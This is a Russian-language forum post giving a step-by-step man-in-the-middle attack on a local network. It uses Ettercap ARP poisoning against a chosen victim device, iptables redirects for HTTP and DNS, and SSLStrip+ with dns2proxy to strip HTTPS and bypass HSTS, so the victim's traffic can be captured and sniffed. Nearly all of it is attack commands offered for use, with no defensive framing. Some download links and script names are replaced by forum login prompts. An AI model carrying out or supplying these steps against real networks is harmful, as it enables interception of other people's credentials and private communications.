Обход HTTPS и HSTS

\kout

Местный
29
102
18 Май 2017
Переведем нашу машину в режим пересылки:

echo "1" > /proc/sys/net/ipv4/ip_forward

Запускаем Ettercap в графическом интерфейсе:

ettercap -G

В меню выбираем Sniff, далее Unified, выбираем желаемый интерфейс:

Теперь выбираем Hosts, в нём подпункт Scan for hosts. После окончания сканирования выберите Hosts list:

В качестве Цели1 выберите роутер (Add to Target 1), в качестве Цели2 выберите устройство, которое будете атаковать (Add to Target 2).

Теперь настройте iptables для редиректа HTTP трафика:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 3001

iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53

Скачиваем и запускаем SSLStrip+.

git clone Для просмотра ссылки Войди или Зарегистрируйся
cd sslstrip2/
python2 ./Для просмотра ссылки Войди или Зарегистрируйся -f -k -l 3001

Скачиваем и запускаем dns2proxy:

git clone Для просмотра ссылки Войди или Зарегистрируйся
cd dns2proxy/
python2 Для просмотра ссылки Войди или Зарегистрируйся

Для анализа данных запускаем любую удобную вам программу:

Wireshark.
Driftnet
Bettercap
и т.д